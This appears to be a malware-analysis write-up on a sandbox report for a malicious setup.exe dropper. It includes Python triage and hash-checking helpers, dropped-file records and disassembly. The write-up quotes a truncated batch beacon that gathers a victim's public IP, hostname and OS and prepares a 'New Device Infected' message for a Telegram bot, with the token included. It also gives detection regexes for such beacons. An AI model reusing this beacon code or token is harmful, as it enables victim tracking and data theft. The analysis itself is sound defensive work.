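# The preview (and therefore this sample) stops after the "set message=" line;
# nothing beyond what the report shows is reproduced.
SAMPLE_BAT = "\r\n".join([
    "@shift /0",
    "@echo off",
    ":: Define Telegram bot details",
    "set botToken=7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ",
    "set chatId=6734985705",
    "",
    ":: Get current date and time using PowerShell",
    "for /f \"delims=\" %%i in ('powershell -Command \"(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')\"') do set currentDate=%%i",
    "",
    ":: Get the public IP address",
    "for /f \"delims=\" %%i in ('powershell -Command \"(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')\"') do set publicIp=%%i",
    "",
    ":: Get local machine information (hostname, OS version, and architecture)",
    "for /f \"delims=\" %%i in ('powershell -Command \"$env:COMPUTERNAME\"') do set hostname=%%i",
    "for /f \"delims=\" %%i in ('powershell -Command \"[System.Environment]::OSVersion\"') do set os=%%i",
    "for /f \"delims=\" %%i in ('powershell -Command \"if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }\"') do set architecture=%%i",
    "",
    ":: Compose the message",
    "set message= @New Device Infected!!!, > System Information: Date: %currentDate%, Hostname: %hostname%,",
])

# Telegram bot tokens look like <numeric bot id>:<35-character secret>.
# The exact widths used here are an assumption based on that common format.
TELEGRAM_TOKEN_RE = re.compile(r"(?<![\w-])(\d{8,12}):([A-Za-z0-9_-]{35})(?![\w-])")
# `set NAME=VALUE`, wherever it appears (also inside `for ... do set X=%%i`).
SET_VAR_RE = re.compile(r"\bset\s+([A-Za-z_]\w*)=([^\r\n]*)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
# Public-IP lookup services. ipify is the one this script uses; the others are
# an assumed extension so the helper also catches the usual substitutes.
IP_LOOKUP_HOSTS = ("api.ipify.org", "ifconfig.me", "icanhazip.com", "ipinfo.io")


def parse_set_vars(script: str) -> dict:
    """Return every batch `set NAME=VALUE` assignment (last assignment wins).
    Values stay raw, so `%%i` placeholders filled by for-loops remain visible."""
    return {m.group(1): m.group(2).rstrip() for m in SET_VAR_RE.finditer(script)}


def find_telegram_tokens(script: str) -> list:
    """Return (bot_id, secret) pairs shaped like Telegram Bot API tokens."""
    return [(m.group(1), m.group(2)) for m in TELEGRAM_TOKEN_RE.finditer(script)]


def extract_urls(script: str) -> list:
    return URL_RE.findall(script)


def triage_batch(script: str) -> dict:
    """Collect the indicators an analyst would block or hunt on."""
    variables = parse_set_vars(script)
    tokens = find_telegram_tokens(script)
    urls = extract_urls(script)
    return {
        "variables": variables,
        "telegram_tokens": [f"{bot_id}:{secret}" for bot_id, secret in tokens],
        "telegram_bot_ids": [bot_id for bot_id, _ in tokens],
        "chat_ids": [v for k, v in variables.items() if k.lower() == "chatid"],
        "urls": urls,
        # Host of the Bot API. Which method the script calls is in the truncated
        # tail of the preview, so only the host is reported, and only if a token
        # was found.
        "c2_hosts": ["api.telegram.org"] if tokens else [],
        "ip_lookup_urls": [u for u in urls if any(h in u for h in IP_LOOKUP_HOSTS)],
        "spawns_powershell": "powershell" in script.lower(),
    }


if __name__ == "__main__":
    for key, value in triage_batch(SAMPLE_BAT).items():
        print(f"{key}: {value}")
```

On a live host the same helper can be pointed at any `.bat`/`.cmd` written under `%TEMP%` or the Startup folder; a hit on the token regex together with an `api.ipify.org` URL is a strong, cheap detection for this family of one-file beacons, and the bot id is what you search for across other samples, since operators reuse bots far more often than droppers.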
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
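The sixteen entries above are all the same 60-byte file. PowerShell itself writes this script (the `__PSScriptPolicyTest_*.ps1` file in the user's temp directory) at start-up to test whether AppLocker or WDAC would block script execution, so one copy appears per powershell.exe the sandbox observed (System32 and SysWOW64 hosts alike), and every copy is correctly marked `Malicious:false`; do not turn its hashes into indicators. The entries are still useful for one thing: they let you check what the report's `Entropy (8bit)` field means and that the hashes really are over the bytes on disk. The Python below is an added example, not part of the report: it rebuilds the file from the preview (the trailing space is not visible in the preview but is required to reach the listed 60 bytes), recomputes size, Shannon entropy in bits per byte and the hashes, and compares them with the values the report lists. The entropy buckets in `classify_entropy` are conventional triage thresholds I chose, not the sandbox's.

```python
import hashlib
import math
from collections import Counter

# Constructed input: the test script PowerShell writes on start-up to probe the
# AppLocker/WDAC lockdown policy. The report lists 60 bytes with no line
# terminator; the sentence alone is 59, hence the trailing space.
APPLOCKER_TEST_FILE = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report's dropped-file record for this artifact.
REPORTED = {
    "size": 60,
    "entropy": 4.038920595031593,
    "md5": "d17fe0a3f47be24a6453e9ef58c94641",
    "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7",
}


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy over byte values, in bits per byte (0.0 .. 8.0).
    This is the quantity the report calls 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def profile_file(data: bytes) -> dict:
    """Recompute the size, hash and entropy fields of a dropped-file record."""
    return {
        "size": len(data),
        "entropy": shannon_entropy_8bit(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
    }


def matches_report(data: bytes, reported: dict, tol: float = 1e-9) -> bool:
    """True when the bytes reproduce every field the report lists.
    Floats are compared with a tolerance; hashes case-insensitively."""
    profile = profile_file(data)
    for key, want in reported.items():
        got = profile[key]
        if isinstance(want, float):
            if abs(got - want) > tol:
                return False
        elif str(got).lower() != str(want).lower():
            return False
    return True


def classify_entropy(entropy: float) -> str:
    """Coarse triage buckets. Thresholds are conventional, chosen here as an
    assumption; compiled code usually sits around 6 to 7 bits per byte, and
    values approaching 8 suggest packing or encryption."""
    if entropy >= 7.2:
        return "packed/encrypted"
    if entropy >= 6.0:
        return "typical compiled code"
    return "text/low-entropy data"


if __name__ == "__main__":
    p = profile_file(APPLOCKER_TEST_FILE)
    print(p)
    print("matches report:", matches_report(APPLOCKER_TEST_FILE, REPORTED))
    for name, value in (("AppLocker test file", p["entropy"]),
                        ("svchost.exe (dropped)", 6.963700877666065),
                        ("setup.exe (sample)", 7.373879840623396)):
        print(f"{name}: {value:.3f} -> {classify_entropy(value)}")
```

Run against the other entries' bytes, the same `profile_file` reproduces their records; the bucket labels line up with the report's own findings, since the dropped `svchost.exe` at about 6.96 bits reads as ordinary compiled code while the 7.37-bit `setup.exe` is in the range where the "Detected unpacking" signature becomes expected rather than surprising.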
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):29830891
                                    Entropy (8bit):5.975290766049405
                                    Encrypted:false
                                    SSDEEP:196608:RECz7ECs7n7XVN7JHz6XfiedozPm8bIC8XkDbcxqgJ:o7771z7BsC8McF
                                    MD5:0302EF4E965477DD225B298374C62722
                                    SHA1:8F810D96CEF93411AE6E9A14EA02B174CA3CF533
                                    SHA-256:8EAF38FD9353ACBE0BCA3893F176D2BAD346501C727AA20E588B7792F676EECE
                                    SHA-512:268BE3E500076AE8660B98A43AE00D00CEAB000FD8869ADFE5A0531A80A2E0651BB8AABA0611634AC66F02561E224A3A8A1CD5E9266E0B135A904EC080C8B21F
                                    Malicious:true
                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....F.]..................`..nf.......`.......`...@..........................P.......>...........@....................d...... d..>...`n.V.9...................e.TQ...p........................d......................+d......`d.xh...................text....`.......`................. ..`.itext...-....`.......`............. ..`.data.........`.......`.............@....bss........pb..........................idata...>... d..@...Vb.............@....didata.xh...`d..j....b.............@....edata........d.......c.............@..@.tls....H.....d..........................rdata..].....d.......c.............@..@.reloc..TQ....e..R....c.............@..B.rsrc...V.9..`n...9..Vl.............@..@.debug....!..p....!..Z..............@..@................
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):551084
                                    Entropy (8bit):6.910089088384593
                                    Encrypted:false
                                    SSDEEP:12288:Rn0LIyy/LMIsHZo6gM2WX4P3p9b9fi/DIAhijXlQ:wI3IIs5o6H2WXQ3p9li/DP4Q
                                    MD5:487267C7B1B9BB3029AD15AAF79827A2
                                    SHA1:E0A3DF69D90D8C3020FD4EB93BE65E9711F78125
                                    SHA-256:C466AD3096266AE1DA89D86EC2D4C4CAD2391396713722AF800A7239FF1FCEC4
                                    SHA-512:839BD92F35F3A9DEFD28B6CAA8F0E4F6B915CE398A3354B5620DB1E9D9C5EA6271CA210C1110588C09DC4CF727C0AD2947C1E36DFE6D489007301263C120E102
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......{..?..W?..W?..W..(W7..W..*W...W..+W2..W/.$W=..W/..V5..W/..V-..W/..V...W6.ZW6..W6.^W=..W6.JW8..W?..W...Wt..V...Wt..V>..Wt.&W>..Wt..V>..WRich?..W........................PE..d.....Xg.........."....).d...,.......(.........@..........................................`............................................4...$...P.......X........0..............d...p4..T....................6..(.......@....................... ....................text....c.......d.................. ..`.rdata..L*.......,...h..............@..@.data...............................@....pdata...0.......2..................@..@.didat..h...........................@....rsrc...X...........................@..@.reloc..d...........................@..B................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):90112
                                    Entropy (8bit):6.718119277627621
                                    Encrypted:false
                                    SSDEEP:1536:r7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf4xQ1HpOK:nq6+ouCpk2mpcWJ0r+QNTBf4o/
                                    MD5:F8ECEDC88E4D2776486231D0EF0AEA5D
                                    SHA1:FCCC180C84DEC726668D48F09B8A0C1C1FBA07A1
                                    SHA-256:B5C30A14E79065EA9A095ECA6655829ACA6272E61B1A73A31FA376FF8B3A793B
                                    SHA-512:0AA1F775851A400ED6513DB836F2788C0D902FB492B91195C234D1067E548BDAC202E69CD3E366D1C73C0DB917C474E93F38F20173C38A78C4BA6804A364FA41
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\tg.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 24%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....P...............0....@.........................................................................|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                    Entropy (8bit):7.373879840623396
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:setup.exe
                                    File size:30'661'632 bytes
                                    MD5:9ee966ddff608734b5b15cd5f1d810d8
                                    SHA1:0b3477a4e740c78a0fbb479353cd068c998ead6f
                                    SHA256:5f82e21c783da05e616618ac9aca0dc5b240bcb3dbf15c4d2d07d19fe57bc056
                                    SHA512:989ad5ef520ba05bc4086ffa754bf367467677982c9189399568122560ab8f98c5aca807334bd453c1bf74deaff8b1614aa66ef9fea66b66c9226ad2721b4954
                                    SSDEEP:393216:2+qBLQ7qUVsWKjm9I+dhNHMwwCGl8Xh2Y1bL0vXK/ZKXJnMgORT:Y+vsWKjm9fPU8xYx2N
                                    TLSH:97676BAA14C3487491D86AC6D47CE94542BBAE8C7854F8BA496FFC9F7320CB134364B7
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@........................................................................
                                    Icon Hash:0f6d1a92b25b290f
                                    Entrypoint:0x401515
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:6f462fcc6b830b77fb3fef2add9dc570
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000008h
                                    nop
                                    mov eax, 00000004h
                                    push eax
                                    mov eax, 00000000h
                                    push eax
                                    lea eax, dword ptr [ebp-04h]
                                    push eax
                                    call 00007FF68CBB3DF1h
                                    add esp, 0Ch
                                    mov eax, 004014F3h
                                    push eax
                                    call 00007FF68CBB3E2Bh
                                    mov eax, 00000001h
                                    push eax
                                    call 00007FF68CBB3E28h
                                    add esp, 04h
                                    mov eax, 00030000h
                                    push eax
                                    mov eax, 00010000h
                                    push eax
                                    call 00007FF68CBB3E1Ch
                                    add esp, 08h
                                    mov eax, dword ptr [021119C8h]
                                    mov ecx, dword ptr [021119CCh]
                                    mov edx, dword ptr [021119D0h]
                                    mov dword ptr [ebp-08h], eax
                                    lea eax, dword ptr [ebp-04h]
                                    push eax
                                    mov eax, dword ptr [02112000h]
                                    push eax
                                    push edx
                                    push ecx
                                    mov eax, dword ptr [ebp-08h]
                                    push eax
                                    call 00007FF68CBB3DF6h
                                    add esp, 14h
                                    mov eax, dword ptr [021119C8h]
                                    mov ecx, dword ptr [021119CCh]
                                    mov edx, dword ptr [021119D0h]
                                    mov dword ptr [ebp-08h], eax
                                    mov eax, dword ptr [edx]
                                    push eax
                                    mov eax, dword ptr [ecx]
                                    push eax
                                    mov eax, dword ptr [ebp-08h]
                                    mov eax, dword ptr [eax]
                                    push eax
                                    call 00007FF68CBB3BCCh
                                    add esp, 0Ch
                                    push eax
                                    call 00007FF68CBB3DCCh
                                    add esp, 04h
                                    leave
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000004h
                                    nop
                                    mov eax, dword ptr [021119C8h]
                                    mov ecx, dword ptr [ebp+08h]
                                    mov dword ptr [eax], ecx
                                    mov eax, dword ptr [00000000h]
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d11950 | 0x50 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d13000 | 0x2d390 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
